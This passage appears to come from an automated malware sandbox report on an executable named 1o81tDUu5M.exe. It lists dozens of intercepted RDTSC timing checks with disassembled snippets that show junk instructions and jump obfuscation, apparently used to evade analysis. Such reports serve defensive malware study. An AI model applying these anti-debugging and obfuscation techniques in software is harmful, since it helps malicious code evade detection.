00007FE80147AC06h 0x0000004a and esi, 1AB8A878h 0x00000050 jmp 00007FE80147ABFBh 0x00000055 popfd 0x00000056 popad 0x00000057 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 6DA0A40 second address: 6DA0A46 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 6DA0A46 second address: 6DA0A4A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 6DA0A4A second address: 6DA0A84 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE80149857Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov eax, dword ptr [ebx+18h] 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 pushfd 0x00000012 jmp 00007FE80149857Bh 0x00000017 jmp 00007FE801498583h 0x0000001c popfd 0x0000001d mov edi, esi 0x0000001f popad 0x00000020 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 6DA0A84 second address: 6DA0A98 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FE80147AC00h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 6DA0A98 second address: 6DA0AAB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esi+38h], eax 0x0000000b pushad 0x0000000c mov si, dx 0x0000000f push eax 0x00000010 push edx 0x00000011 mov eax, edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 6DA0AAB second address: 6DA0ABB instructions: 0x00000000 rdtsc 0x00000002 mov bh, A3h 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov eax, dword ptr [ebx+1Ch] 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 6DA0ABB second address: 6DA0ACA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE80149857Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 6DA0ACA second address: 6DA0B52 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ax, bx 0x00000006 jmp 00007FE80147ABFBh 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e mov dword ptr [esi+3Ch], eax 0x00000011 pushad 0x00000012 pushfd 0x00000013 jmp 00007FE80147ABFBh 0x00000018 xor ecx, 4BAD0DBEh 0x0000001e jmp 00007FE80147AC09h 0x00000023 popfd 0x00000024 popad 0x00000025 mov eax, dword ptr [ebx+20h] 0x00000028 jmp 00007FE80147ABFEh 0x0000002d mov dword ptr [esi+40h], eax 0x00000030 jmp 00007FE80147AC00h 0x00000035 lea eax, dword ptr [ebx+00000080h] 0x0000003b push eax 0x0000003c push edx 0x0000003d jmp 00007FE80147AC07h 0x00000042 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 6DA0B52 second address: 6DA0B6A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FE801498584h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 6DA0B6A second address: 6DA0B7A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push 00000001h 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 6DA0B7A second address: 6DA0B7E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 6DA0B7E second address: 6DA0B82 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 6DA0B82 second address: 6DA0B88 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 6DA0B88 second address: 6DA0BD1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FE80147AC01h 0x00000009 add eax, 552E3C16h 0x0000000f jmp 00007FE80147AC01h 0x00000014 popfd 0x00000015 call 00007FE80147AC00h 0x0000001a pop ecx 0x0000001b popad 0x0000001c pop edx 0x0000001d pop eax 0x0000001e push edx 0x0000001f pushad 0x00000020 mov al, ACh 0x00000022 push eax 0x00000023 push edx 0x00000024 push edx 0x00000025 pop eax 0x00000026 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 6DA0BD1 second address: 6DA0C2B instructions: 0x00000000 rdtsc 0x00000002 call 00007FE80149857Bh 0x00000007 pop esi 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b mov dword ptr [esp], eax 0x0000000e pushad 0x0000000f mov ecx, ebx 0x00000011 mov di, C844h 0x00000015 popad 0x00000016 lea eax, dword ptr [ebp-10h] 0x00000019 jmp 00007FE801498583h 0x0000001e nop 0x0000001f jmp 00007FE801498586h 0x00000024 push eax 0x00000025 push eax 0x00000026 push edx 0x00000027 jmp 00007FE80149857Eh 0x0000002c rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 6DA0C65 second address: 6DA0C6D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ax, di 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 6DA0C6D second address: 6DA0C89 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov edi, eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c mov dh, al 0x0000000e jmp 00007FE80149857Dh 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 6DA0C89 second address: 6DA0CA6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE80147AC01h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 test edi, edi 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 6DA0CA6 second address: 6DA0CAA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 6DA0CAA second address: 6DA0CB0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 6DA0CB0 second address: 6DA0CE1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE801498582h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 js 00007FE86F4F6F73h 0x0000000f pushad 0x00000010 mov bx, cx 0x00000013 mov ah, 28h 0x00000015 popad 0x00000016 mov eax, dword ptr [ebp-0Ch] 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c pushad 0x0000001d popad 0x0000001e mov esi, 221D1323h 0x00000023 popad 0x00000024 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 6DA0CE1 second address: 6DA0CE6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 6DA0CE6 second address: 6DA0D3E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov dword ptr [esi+04h], eax 0x0000000a pushad 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007FE80149857Ah 0x00000012 and eax, 64045A68h 0x00000018 jmp 00007FE80149857Bh 0x0000001d popfd 0x0000001e call 00007FE801498588h 0x00000023 pop eax 0x00000024 popad 0x00000025 pushad 0x00000026 call 00007FE801498581h 0x0000002b pop ecx 0x0000002c push eax 0x0000002d push edx 0x0000002e rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 6DA0D3E second address: 6DA0DB3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 lea eax, dword ptr [ebx+78h] 0x00000009 pushad 0x0000000a call 00007FE80147AC03h 0x0000000f movzx esi, bx 0x00000012 pop edi 0x00000013 mov dh, ch 0x00000015 popad 0x00000016 push 00000001h 0x00000018 jmp 00007FE80147ABFDh 0x0000001d nop 0x0000001e jmp 00007FE80147ABFEh 0x00000023 push eax 0x00000024 pushad 0x00000025 mov ebx, 15B3EC64h 0x0000002a mov edx, 0BF56AD0h 0x0000002f popad 0x00000030 nop 0x00000031 pushad 0x00000032 jmp 00007FE80147AC01h 0x00000037 popad 0x00000038 lea eax, dword ptr [ebp-08h] 0x0000003b push eax 0x0000003c push edx 0x0000003d jmp 00007FE80147ABFDh 0x00000042 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 6DA0DB3 second address: 6DA0DB9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 6DA0DB9 second address: 6DA0DBD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 6DA0DBD second address: 6DA0DC1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 6DA0DC1 second address: 6DA0DEE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esi 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007FE80147AC01h 0x00000012 jmp 00007FE80147ABFBh 0x00000017 popfd 0x00000018 mov ah, 93h 0x0000001a popad 0x0000001b rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 6DA0DEE second address: 6DA0E03 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FE801498581h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 6DA0E03 second address: 6DA0E07 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 6DA0E32 second address: 6DA0E36 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 6DA0E36 second address: 6DA0E3A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 6DA0E3A second address: 6DA0E40 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 6DA0E40 second address: 6DA0EC6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007FE80147AC08h 0x00000008 pop ecx 0x00000009 call 00007FE80147ABFBh 0x0000000e pop esi 0x0000000f popad 0x00000010 pop edx 0x00000011 pop eax 0x00000012 mov edi, eax 0x00000014 jmp 00007FE80147ABFFh 0x00000019 test edi, edi 0x0000001b jmp 00007FE80147AC06h 0x00000020 js 00007FE86F4D941Bh 0x00000026 jmp 00007FE80147AC00h 0x0000002b mov eax, dword ptr [ebp-04h] 0x0000002e push eax 0x0000002f push edx 0x00000030 jmp 00007FE80147AC07h 0x00000035 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 6DA0EC6 second address: 6DA0EFA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx ebx, si 0x00000006 call 00007FE801498580h 0x0000000b pop eax 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f mov dword ptr [esi+08h], eax 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007FE801498583h 0x0000001b rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 6DA0EFA second address: 6DA0F17 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE80147AC09h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 6DA0F17 second address: 6DA0F1D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 6DA0F1D second address: 6DA0F42 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE80147AC03h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b lea eax, dword ptr [ebx+70h] 0x0000000e pushad 0x0000000f mov di, si 0x00000012 push eax 0x00000013 push edx 0x00000014 movzx esi, dx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 6DA0F42 second address: 6DA0FE8 instructions: 0x00000000 rdtsc 0x00000002 mov si, dx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 popad 0x00000008 push 00000001h 0x0000000a jmp 00007FE801498585h 0x0000000f nop 0x00000010 pushad 0x00000011 mov dx, cx 0x00000014 pushfd 0x00000015 jmp 00007FE801498588h 0x0000001a sub ecx, 5687D2C8h 0x00000020 jmp 00007FE80149857Bh 0x00000025 popfd 0x00000026 popad 0x00000027 push eax 0x00000028 jmp 00007FE801498589h 0x0000002d nop 0x0000002e jmp 00007FE80149857Eh 0x00000033 lea eax, dword ptr [ebp-18h] 0x00000036 jmp 00007FE801498580h 0x0000003b nop 0x0000003c push eax 0x0000003d push edx 0x0000003e jmp 00007FE801498587h 0x00000043 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 6DA0FE8 second address: 6DA1000 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FE80147AC04h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 6DA1000 second address: 6DA1028 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE80149857Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f mov ax, 8AE1h 0x00000013 jmp 00007FE80149857Eh 0x00000018 popad 0x00000019 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 6DA1105 second address: 6DA110B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 6DA110B second address: 6DA1169 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, 00000000h 0x0000000d pushad 0x0000000e mov ebx, eax 0x00000010 jmp 00007FE801498582h 0x00000015 popad 0x00000016 lock cmpxchg dword ptr [edx], ecx 0x0000001a push eax 0x0000001b push edx 0x0000001c pushad 0x0000001d mov ecx, edx 0x0000001f pushfd 0x00000020 jmp 00007FE801498589h 0x00000025 or si, 21B6h 0x0000002a jmp 00007FE801498581h 0x0000002f popfd 0x00000030 popad 0x00000031 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 6DA1169 second address: 6DA116F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 6DA116F second address: 6DA1173 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 6DA1173 second address: 6DA11C7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE80147AC03h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop edi 0x0000000c pushad 0x0000000d mov dx, ax 0x00000010 movzx ecx, di 0x00000013 popad 0x00000014 test eax, eax 0x00000016 jmp 00007FE80147AC03h 0x0000001b jne 00007FE86F4D9128h 0x00000021 push eax 0x00000022 push edx 0x00000023 jmp 00007FE80147AC05h 0x00000028 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 6DA11C7 second address: 6DA11EE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE801498581h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov edx, dword ptr [ebp+08h] 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FE80149857Dh 0x00000013 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 6DA11EE second address: 6DA1224 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE80147AC01h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esi] 0x0000000b pushad 0x0000000c mov di, ax 0x0000000f push esi 0x00000010 jmp 00007FE80147ABFFh 0x00000015 pop ecx 0x00000016 popad 0x00000017 mov dword ptr [edx], eax 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c movzx esi, di 0x0000001f popad 0x00000020 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 6DA1224 second address: 6DA122A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 6DA122A second address: 6DA124F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [esi+04h] 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FE80147AC06h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 6DA124F second address: 6DA1253 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 6DA1253 second address: 6DA1259 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 6DA1259 second address: 6DA126A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FE80149857Dh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 6DA126A second address: 6DA12C2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE80147AC01h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [edx+04h], eax 0x0000000e pushad 0x0000000f push ecx 0x00000010 mov edi, 0B15DC8Eh 0x00000015 pop ebx 0x00000016 mov si, 14CBh 0x0000001a popad 0x0000001b mov eax, dword ptr [esi+08h] 0x0000001e pushad 0x0000001f pushad 0x00000020 pushfd 0x00000021 jmp 00007FE80147ABFAh 0x00000026 sbb eax, 2D68C7D8h 0x0000002c jmp 00007FE80147ABFBh 0x00000031 popfd 0x00000032 mov cx, DE8Fh 0x00000036 popad 0x00000037 movzx ecx, dx 0x0000003a popad 0x0000003b mov dword ptr [edx+08h], eax 0x0000003e pushad 0x0000003f push eax 0x00000040 push edx 0x00000041 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 6DA12C2 second address: 6DA13E0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE801498586h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007FE801498582h 0x0000000e popad 0x0000000f mov eax, dword ptr [esi+0Ch] 0x00000012 jmp 00007FE801498580h 0x00000017 mov dword ptr [edx+0Ch], eax 0x0000001a pushad 0x0000001b pushfd 0x0000001c jmp 00007FE80149857Eh 0x00000021 xor si, B6F8h 0x00000026 jmp 00007FE80149857Bh 0x0000002b popfd 0x0000002c jmp 00007FE801498588h 0x00000031 popad 0x00000032 mov eax, dword ptr [esi+10h] 0x00000035 jmp 00007FE801498580h 0x0000003a mov dword ptr [edx+10h], eax 0x0000003d jmp 00007FE801498580h 0x00000042 mov eax, dword ptr [esi+14h] 0x00000045 jmp 00007FE801498580h 0x0000004a mov dword ptr [edx+14h], eax 0x0000004d pushad 0x0000004e push esi 0x0000004f pushfd 0x00000050 jmp 00007FE80149857Dh 0x00000055 sbb esi, 00B65656h 0x0000005b jmp 00007FE801498581h 0x00000060 popfd 0x00000061 pop ecx 0x00000062 pushad 0x00000063 jmp 00007FE801498587h 0x00000068 mov ecx, 2416ABAFh 0x0000006d popad 0x0000006e popad 0x0000006f mov eax, dword ptr [esi+18h] 0x00000072 jmp 00007FE801498582h 0x00000077 mov dword ptr [edx+18h], eax 0x0000007a pushad 0x0000007b push eax 0x0000007c push edx 0x0000007d pushad 0x0000007e popad 0x0000007f rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 6DA13E0 second address: 6DA1477 instructions: 0x00000000 rdtsc 0x00000002 movzx ecx, di 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov eax, ebx 0x00000009 popad 0x0000000a mov eax, dword ptr [esi+1Ch] 0x0000000d pushad 0x0000000e pushad 0x0000000f pushfd 0x00000010 jmp 00007FE80147ABFDh 0x00000015 xor eax, 53CF0A76h 0x0000001b jmp 00007FE80147AC01h 0x00000020 popfd 0x00000021 pushfd 0x00000022 jmp 00007FE80147AC00h 0x00000027 add ecx, 70C69F98h 0x0000002d jmp 00007FE80147ABFBh 0x00000032 popfd 0x00000033 popad 0x00000034 push esi 0x00000035 push edi 0x00000036 pop esi 0x00000037 pop edi 0x00000038 popad 0x00000039 mov dword ptr [edx+1Ch], eax 0x0000003c jmp 00007FE80147ABFEh 0x00000041 mov eax, dword ptr [esi+20h] 0x00000044 pushad 0x00000045 mov di, si 0x00000048 mov ch, 77h 0x0000004a popad 0x0000004b mov dword ptr [edx+20h], eax 0x0000004e push eax 0x0000004f push edx 0x00000050 push eax 0x00000051 push edx 0x00000052 jmp 00007FE80147AC07h 0x00000057 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 6DA1477 second address: 6DA147D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 6DA147D second address: 6DA14E5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE80147AC04h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esi+24h] 0x0000000c jmp 00007FE80147AC00h 0x00000011 mov dword ptr [edx+24h], eax 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 mov dx, 5A00h 0x0000001b pushfd 0x0000001c jmp 00007FE80147AC09h 0x00000021 sub ecx, 4D380C06h 0x00000027 jmp 00007FE80147AC01h 0x0000002c popfd 0x0000002d popad 0x0000002e rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 6DA14E5 second address: 6DA14EB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 6DA14EB second address: 6DA14EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 6DA14EF second address: 6DA14F3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 6DA14F3 second address: 6DA1509 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [esi+28h] 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e mov ecx, 6C6190A7h 0x00000013 push eax 0x00000014 pop edx 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 6DA1509 second address: 6DA1559 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FE80149857Fh 0x00000009 xor ah, FFFFFFEEh 0x0000000c jmp 00007FE801498589h 0x00000011 popfd 0x00000012 push ecx 0x00000013 pop edi 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 mov dword ptr [edx+28h], eax 0x0000001a push eax 0x0000001b push edx 0x0000001c push eax 0x0000001d push edx 0x0000001e jmp 00007FE801498584h 0x00000023 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 6DA1559 second address: 6DA1568 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE80147ABFBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 6DA1568 second address: 6DA160F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ax, di 0x00000006 push edi 0x00000007 pop esi 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov ecx, dword ptr [esi+2Ch] 0x0000000e pushad 0x0000000f pushfd 0x00000010 jmp 00007FE801498583h 0x00000015 or cx, C80Eh 0x0000001a jmp 00007FE801498589h 0x0000001f popfd 0x00000020 mov dx, cx 0x00000023 popad 0x00000024 mov dword ptr [edx+2Ch], ecx 0x00000027 pushad 0x00000028 mov esi, 5915E40Fh 0x0000002d call 00007FE801498584h 0x00000032 pushfd 0x00000033 jmp 00007FE801498582h 0x00000038 xor eax, 2CA688E8h 0x0000003e jmp 00007FE80149857Bh 0x00000043 popfd 0x00000044 pop eax 0x00000045 popad 0x00000046 mov ax, word ptr [esi+30h] 0x0000004a jmp 00007FE80149857Fh 0x0000004f mov word ptr [edx+30h], ax 0x00000053 push eax 0x00000054 push edx 0x00000055 push eax 0x00000056 push edx 0x00000057 pushad 0x00000058 popad 0x00000059 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 6DA160F second address: 6DA1613 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
